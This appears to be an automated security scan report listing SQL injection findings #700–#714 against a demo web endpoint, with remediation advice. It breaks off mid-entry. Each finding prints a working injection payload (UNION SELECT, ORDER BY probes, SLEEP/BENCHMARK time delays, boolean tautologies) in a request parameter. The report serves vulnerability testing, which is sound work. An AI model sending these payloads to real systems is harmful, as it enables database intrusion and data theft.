demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #700\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #701\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #702\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #703\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #704\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #705\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #706\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #707\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #708\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #709\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or ('x')=('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #710\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io '''''''''''''UNION SELECT '2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #711\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #712\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #713\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #714\nScan SQL Injection\nSeverity ERROR\nEndpoint 